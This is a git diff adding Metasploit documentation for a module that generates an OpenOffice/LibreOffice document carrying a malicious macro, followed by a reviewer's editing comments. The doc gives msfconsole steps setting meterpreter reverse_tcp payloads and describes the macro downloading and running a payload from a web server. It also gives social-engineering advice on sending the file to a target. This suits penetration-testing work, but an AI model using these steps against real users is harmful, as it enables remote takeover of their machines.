Add doc for openoffice_document_macro
parent
047a9b17cf
commit
3e2e15c7b8
|
@ -0,0 +1,59 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also
|
||||||
|
works against LibreOffice.
|
||||||
|
|
||||||
|
For exploit successfully, the targeted user must adjust the security level in Macro Security to
|
||||||
|
either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the
|
||||||
|
macro. If set to Low, the macro can automatically run without any warning.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
* Apache OpenOffice
|
||||||
|
* LibreOffice
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
To use this exploit, you must know the platform of the targeted user. The module supports either
|
||||||
|
Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro
|
||||||
|
with malicious Powershell code inside. For other supported platforms, the exploit will generate
|
||||||
|
Python code.
|
||||||
|
|
||||||
|
An example of using this module against Windows:
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
||||||
|
3. ```set target 0```
|
||||||
|
4. ```set payload windows/meterpreter/reverse_tcp```
|
||||||
|
5. ```exploit```
|
||||||
|
|
||||||
|
An example of using this module against Linux or OSX:
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. ```use exploit/multi/misc/openoffice_document_macro```
|
||||||
|
3. ```set target 1```
|
||||||
|
4. ```set payload python/meterpreter/reverse_tcp```
|
||||||
|
5. ```exploit```
|
||||||
|
|
||||||
|
Once started, the module will mainly do these things:
|
||||||
|
|
||||||
|
1. It will start a payload handler.
|
||||||
|
2. It will start a web server. This is used for the macro to download and execute our final payload.
|
||||||
|
3. The malicious odt file. Send this to your targeted user.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**BODY**
|
||||||
|
|
||||||
|
This option can be used to insert text to the malicious document.
|
||||||
|
|
||||||
|
## Modification
|
||||||
|
|
||||||
|
Since social engineering will play a big part in the success of the attack, you will most likely
|
||||||
|
want to modify the odt file.
|
||||||
|
|
||||||
|
1. To do so, first use msfconsole to generate the malicious odt file.
|
||||||
|
2. Move the odt file to a system that has OpenOffice or LibreOffice
|
||||||
|
3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro
|
||||||
|
code unless you actually know what you're doing.
|
||||||
|
|
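Review bot: Both walkthroughs under "Verification Steps" stop at `exploit` without stating the expected result, so a tester cannot tell a working run from a failed one. Add where the generated odt file is written and what a successful run looks like after the target opens it. In the "Once started" list, item 3 ("The malicious odt file.") is a fragment; phrase it as an action like items 1 and 2, for example "It will generate the malicious odt file." The Description makes success depend on Macro Security being set to Medium or Low, but "Vulnerable Application" gives no steps for setting that level on a test install, which leaves the setup unreproducible. Wording: "For exploit successfully" should read "For the exploit to succeed", and "supports either Windows, Linux, and OSX" should drop "either". The "Options" section documents only BODY; if the module registers other options, list them here as well.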